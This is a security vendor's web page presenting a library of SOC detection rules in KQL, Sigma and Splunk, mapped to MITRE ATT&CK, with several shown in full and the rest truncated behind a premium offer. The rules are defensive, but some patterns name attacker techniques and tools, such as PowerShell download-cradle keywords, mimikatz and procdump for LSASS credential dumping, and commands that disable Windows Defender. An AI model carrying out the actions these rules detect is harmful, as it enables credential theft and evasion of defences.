PREMIUM

Detection Library

Battle-tested detection rules for real SOC environments. KQL, Sigma, and Splunk โ€” curated by practitioners, mapped to MITRE ATT&CK.

Every rule in this library is production-ready. Written by security operators, tested in real environments, and mapped to MITRE ATT&CK techniques. Copy, paste, detect.

Free rules are fully visible. Premium rules show description and metadata โ€” unlock the full query with SCW Premium.

Browse Rules Get Premium Access
14 Detection Rules
3 Platforms
10 ATT&CK Categories

RULES  Detection Rules

14

Brute Force โ€“ Failed Logons Spike

FREE

T1110.001 โ€” Brute Force: Password Guessing

Detects more than 10 failed sign-in attempts from a single IP within 5 minutes. Classic brute force indicator.

high KQL (Sentinel)
brute-forceidentitySigninLogs 
SigninLogs
| where ResultType != "0"
| summarize FailedCount = count() by IPAddress, bin(TimeGenerated, 5m)
| where FailedCount > 10
| project TimeGenerated, IPAddress, FailedCount

๐Ÿ’ก Note: Tune the threshold based on your environment. Consider excluding known VPN IPs.

Suspicious PowerShell Execution

FREE

T1059.001 โ€” Command and Scripting Interpreter: PowerShell

Flags PowerShell processes with encoded commands, download cradles, or bypass flags โ€” common in initial access and execution stages.

high KQL (Sentinel)
powershellexecutionevasion 
DeviceProcessEvents
| where FileName == "powershell.exe" or FileName == "pwsh.exe"
| where ProcessCommandLine has_any (
    "-enc", "-encodedcommand", "bypass", "hidden",
    "downloadstring", "invoke-webrequest", "iex",
    "invoke-expression", "Net.WebClient"
  )
| project TimeGenerated, DeviceName, AccountName,
         ProcessCommandLine, InitiatingProcessFileName

๐Ÿ’ก Note: High noise in dev environments. Combine with user risk score for better signal.

New Service Created via sc.exe

FREE

T1543.003 โ€” Create or Modify System Process: Windows Service

Detects service creation using sc.exe โ€” a common persistence mechanism used by attackers and malware.

medium Sigma
persistenceservicesigma 
title: New Service Created via sc.exe
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\sc.exe'
    CommandLine|contains: 'create'
  condition: selection
level: medium

๐Ÿ’ก Note: Filter out known deployment tools (SCCM, Intune) to reduce false positives.

Outbound Data Transfer Spike

FREE

T1048 โ€” Exfiltration Over Alternative Protocol

Identifies hosts transferring unusually large amounts of data outbound โ€” potential exfiltration.

critical KQL (Sentinel)
exfiltrationnetworkfirewall 
CommonSecurityLog
| where DeviceAction == "allow"
| where DestinationIP !startswith "10." and DestinationIP !startswith "192.168."
| summarize TotalBytes = sum(SentBytes) by SourceIP, bin(TimeGenerated, 1h)
| where TotalBytes > 500000000
| project TimeGenerated, SourceIP, TotalBytesMB = TotalBytes / 1048576

๐Ÿ’ก Note: 500MB threshold โ€” adjust for your baseline. Exclude known backup and update servers.

Azure AD Impossible Travel

FREE

T1078 โ€” Valid Accounts

Detects sign-ins from geographically distant locations within a short time window โ€” indicates compromised credentials.

high KQL (Sentinel)
impossible-travelidentityazure-ad 
SigninLogs
| where ResultType == "0"
| extend City = tostring(LocationDetails.city),
         Country = tostring(LocationDetails.countryOrRegion)
| summarize Locations = make_set(Country),
            Cities = make_set(City),
            Count = count()
            by UserPrincipalName, bin(TimeGenerated, 30m)
| where array_length(Locations) > 1

๐Ÿ’ก Note: Enrich with VPN/proxy IP lists to reduce false positives from corporate VPN.

Ransomware โ€“ Mass File Encryption Pattern

๐Ÿ”’ PRO

T1486 โ€” Data Encrypted for Impact

Detects rapid file rename operations with known ransomware extensions โ€” indicates active encryption in progress.

critical KQL (Sentinel)
ransomwareencryptionfile-events
๐Ÿ”’

Unlock with SCW Premium

DeviceFileEvents
| where ActionType == "FileRenamed"
| where FileName has_any...

๐Ÿ’ก Note: Critical severity โ€” trigger immediate SOC escalation. Pair with network isolation automation.

Lateral Movement โ€“ PsExec Remote Execution

๐Ÿ”’ PRO

T1021.002 โ€” Remote Services: SMB/Windows Admin Shares

Detects PsExec-style remote service creation โ€” the most common lateral movement technique in enterprise breaches.

high KQL (Sentinel)
lateral-movementpsexecsmb
๐Ÿ”’

Unlock with SCW Premium

DeviceProcessEvents
| where InitiatingProcessFileName in~ ("psexec.exe","psex...

๐Ÿ’ก Note: High confidence. PsExec in production is almost always suspicious. Whitelist IT tooling explicitly.

Privilege Escalation โ€“ Token Manipulation

๐Ÿ”’ PRO

T1134.001 โ€” Access Token Manipulation: Token Impersonation

Detects access token impersonation techniques commonly used to escalate from user to SYSTEM.

high Sigma
privilege-escalationtokenpotato
๐Ÿ”’

Unlock with SCW Premium

title: Token Impersonation via Known Tools
status: experimental
logsource:
  ...

๐Ÿ’ก Note: Near-zero false positive rate. Detection of these tools almost always indicates compromise.

Phishing โ€“ OAuth Consent Grant Attack

๐Ÿ”’ PRO

T1528 โ€” Steal Application Access Token

Detects when a user grants consent to a suspicious OAuth application โ€” common in modern phishing campaigns.

critical KQL (Sentinel)
phishingoauthconsent-grant
๐Ÿ”’

Unlock with SCW Premium

AuditLogs
| where OperationName == "Consent to application"
| extend AppName ...

๐Ÿ’ก Note: Critical โ€” consent grants can give full mailbox access. Investigate immediately and revoke if unauthorized.

Cloud โ€“ S3 Bucket Made Public

๐Ÿ”’ PRO

T1530 โ€” Data from Cloud Storage

Detects when an S3 bucket ACL is changed to public โ€” immediate data exposure risk.

critical Splunk SPL
cloudawss3public-exposure
๐Ÿ”’

Unlock with SCW Premium

index=aws sourcetype=aws:cloudtrail
  eventName=PutBucketAcl OR eventName=Put...

๐Ÿ’ก Note: Immediate response required. Auto-remediate with Lambda if possible.

Credential Dumping โ€“ LSASS Access

๐Ÿ”’ PRO

T1003.001 โ€” OS Credential Dumping: LSASS Memory

Detects processes accessing LSASS memory โ€” the primary technique for credential harvesting on Windows.

critical KQL (Sentinel)
credential-dumpinglsassmimikatz
๐Ÿ”’

Unlock with SCW Premium

DeviceProcessEvents
| where FileName in~ ("mimikatz.exe","procdump.exe",
    ...

๐Ÿ’ก Note: High confidence. Any LSASS access outside of AV/EDR is suspicious. Trigger immediate investigation.

Defense Evasion โ€“ Disable Windows Defender

๐Ÿ”’ PRO

T1562.001 โ€” Impair Defenses: Disable or Modify Tools

Detects attempts to disable or tamper with Windows Defender via PowerShell, registry, or Group Policy.

high KQL (Sentinel)
evasiondefenderantivirus
๐Ÿ”’

Unlock with SCW Premium

DeviceProcessEvents
| where ProcessCommandLine has_any (
    "Set-MpPreferenc...

๐Ÿ’ก Note: Almost always malicious unless done by authorized IT during maintenance windows.

Lateral Movement โ€“ RDP from Unusual Source

๐Ÿ”’ PRO

T1021.001 โ€” Remote Services: Remote Desktop Protocol

Detects RDP connections from internal hosts that don't normally initiate RDP โ€” potential lateral movement.

medium Splunk SPL
lateral-movementrdplogon
๐Ÿ”’

Unlock with SCW Premium

index=windows EventCode=4624 LogonType=10
| stats count by src_ip, dest, Acco...

๐Ÿ’ก Note: Requires building an RDP baseline lookup first. High value once baseline is established.

Persistence โ€“ Scheduled Task via schtasks

๐Ÿ”’ PRO

T1053.005 โ€” Scheduled Task/Job: Scheduled Task

Detects creation of scheduled tasks via command line โ€” common persistence technique across all threat actors.

medium Sigma
persistencescheduled-tasksigma
๐Ÿ”’

Unlock with SCW Premium

title: Scheduled Task Creation via schtasks.exe
status: stable
logsource:
  c...

๐Ÿ’ก Note: Filter SYSTEM-created tasks to reduce noise. Focus on tasks created by regular user accounts.

Unlock the full Detection Library.

Get access to all 14 detection rules โ€” production-ready queries you can deploy today across KQL, Sigma, and Splunk.

Get Premium Playbooks โ†’